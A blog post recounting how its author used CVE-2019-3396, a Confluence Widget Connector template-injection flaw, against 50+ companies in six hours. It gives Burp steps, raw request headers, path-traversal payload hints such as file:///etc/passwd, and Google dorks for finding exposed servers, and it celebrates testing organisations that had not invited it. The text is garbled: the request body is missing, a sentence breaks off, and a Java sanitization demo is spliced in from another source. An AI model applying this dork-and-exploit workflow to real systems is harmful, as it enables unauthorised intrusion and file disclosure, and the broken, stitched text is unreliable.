How I hacked 50+ Companies in 6 hrs

Vignesh C
Oct 29, 2019 · 4 min read

Long story short, I created my Hackerone/Bugcrowd profiles way back in 2016, but I had never reported a bug there. I had never thought of doing bug hunting, but this vulnerability made me do it.

What was the issue?

SSTI and RCE in Confluence Server via Widget Connector [CVE-2019-3396] — An attacker will be able to exploit this issue to achieve path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center. Confluence Security Advisory Released — 2019-04-17

How is the Widget Connector vulnerable?

The Widget Connector macro lets you embed online videos, slideshows, photostreams and more directly into your page when you provide a URL.

This macro was designed to support content from these sites:

  • YouTube, Vimeo, MySpace Video, Flickr, Twitter, Slide Rocket, Google Calendar, etc.

Example Vulnerable Code:

The Widget Connector defines several renderers, for example FriendFeedRenderer:

    public class FriendFeedRenderer implements WidgetRenderer {
        ...
        public String getEmbeddedHtml(String url, Map<String, String> params) {
            params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
            return this.velocityRenderService.render(getEmbedUrl(url), params);
        }
    }

So in this case an attacker can supply their own _template value in the macro parameters, and the backend passes those parameters straight to the Velocity render service, which loads the template named there.

Steps To Reproduce:

I swear this would be the simplest PoC you can ever dream of.

  1. Capture the vulnerable Confluence page request in Burp (it can be a GET or a POST) and send it to Repeater.

  2. Now modify your captured request as shown below and send the request.

Note: You may need to change the path of your request and add a “Referer:” header, as it was mandatory in most of the cases I tested; if you do not include it, you may get the error “XSRF check failed”.

POST /rest/tinymce/1/macro/preview HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en-GB;q=0.8,ach;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Upgrade-Insecure-Requests: 1
Content-Length: 163
Connection: close

Instead of ../web.xml, you can try file:///etc/passwd (path traversal payloads) or Remote Code Execution to increase the severity of your finding.


In fixed versions, doSanitizeParameters is called before the HTML is rendered, which removes _template from the parameters.
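To make the fix concrete, here is an added example (not Confluence's code and not from the post) that models the parameter flow described above: a stand-in render step that picks its template from _template, the unsanitized path, and the same path with a doSanitizeParameters step that drops the key. Apart from the _template key and the template path quoted above, every name in it is an assumption.

```java
import java.util.HashMap;
import java.util.Map;

// Added illustration, not Confluence's own code. It models the parameter
// flow the post describes: request-supplied macro params reach a template
// engine that reads "_template" from them, and the fix strips that key
// before rendering. Apart from "_template", every name here is a stand-in.
public class WidgetTemplateSanitizationDemo {

    // Hypothetical default the renderer falls back to when no override is set.
    static final String DEFAULT_TEMPLATE =
        "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm";

    // Stand-in for velocityRenderService.render(): a real engine would load
    // and execute whichever template path "_template" names, so this just
    // returns the path it would have loaded to make the decision visible.
    static String templateSelectedBy(Map<String, String> params) {
        return params.getOrDefault("_template", DEFAULT_TEMPLATE);
    }

    // Vulnerable flow: caller-controlled params reach the engine untouched.
    static String renderUnsanitized(Map<String, String> requestParams) {
        return templateSelectedBy(new HashMap<>(requestParams));
    }

    // Fixed flow, as the post describes it: doSanitizeParameters() runs
    // before rendering and drops "_template", so the template choice can
    // never come from the request. (An allow-list of the widget's known
    // keys would be stricter still; that is a suggestion, not the patch.)
    static Map<String, String> doSanitizeParameters(Map<String, String> params) {
        Map<String, String> clean = new HashMap<>(params);
        clean.remove("_template");
        return clean;
    }

    static String renderSanitized(Map<String, String> requestParams) {
        return templateSelectedBy(doSanitizeParameters(requestParams));
    }

    public static void main(String[] args) {
        // Constructed request: a benign widget URL plus an injected
        // "_template" pointing outside the widget-connector template directory.
        Map<String, String> request = new HashMap<>();
        request.put("url", "https://www.youtube.com/watch?v=EXAMPLE");
        request.put("_template", "../web.xml");

        System.out.println("unsanitized -> " + renderUnsanitized(request));
        System.out.println("sanitized   -> " + renderSanitized(request));
    }
}
```

Sanitizing at the entry point protects every renderer, including ones that never set their own _template, whereas relying on each renderer to overwrite the key (as FriendFeedRenderer does) leaves any renderer that forgets to do so exposed.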

Now What?

Yes, you are right! I got an idea: why don’t I Google Dork?

  1. I tried this: “intitle:dashboard-confluence” and was able to find ~100 Confluence links, out of which 21 were found vulnerable.
  2. On seeing the above dork results, I realized that the confluence link may not necessarily be
  3. So I tried the dorks/keywords below in Google, which gave me around 300+ Confluence links, out of which 50+ companies were found vulnerable to this.

inurl:http://confluence. login.action

inurl:https://wiki. .com/confluence/

allinurl: /confluence/login.action?

I hadn’t targeted any of the bounty program sites, yet I received a lot of “Recognition” from various companies as bounties in dollars and euros; other companies said they would send me swag as a token of appreciation.

A day I could remember for a very long time, HAPPY HACKING !!!

Smash your claps if you do like this post.

Follow me on twitter for more updates — @pwn_r00t


Vault Infosec

we vow your security
